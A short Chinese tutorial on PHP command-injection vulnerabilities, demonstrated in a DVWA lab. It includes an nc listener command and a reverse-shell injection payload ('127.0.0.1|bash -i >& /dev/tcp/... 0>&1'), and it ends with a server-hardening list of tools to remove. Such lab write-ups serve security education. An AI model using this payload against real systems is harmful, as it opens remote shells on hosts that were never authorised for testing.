概述
应用有时需要调用一些执行系统命令的函数,如PHP中的system
、exec
、shell_exec
、 passthru
、popen
、proc_popen
等,当用户能控制这些函数中的参数时,就可以将恶意系统命令。 拼接到正常命令中,从而造成命令注入攻击,这就是命令注入漏洞。
反弹shell
在kali上使用nc
监听端口 nc -lvnp 5555
在dvwa web页面输入攻击payload : 127.0.0.1|bash -i >& /dev/tcp/172.16.1.2/5555 0>&1
,其中172.16.1.2
换成自己kali的ip。
总结
linux服务器的安全baseline:不能出现wget
、curl
、git
、gcc
等命令。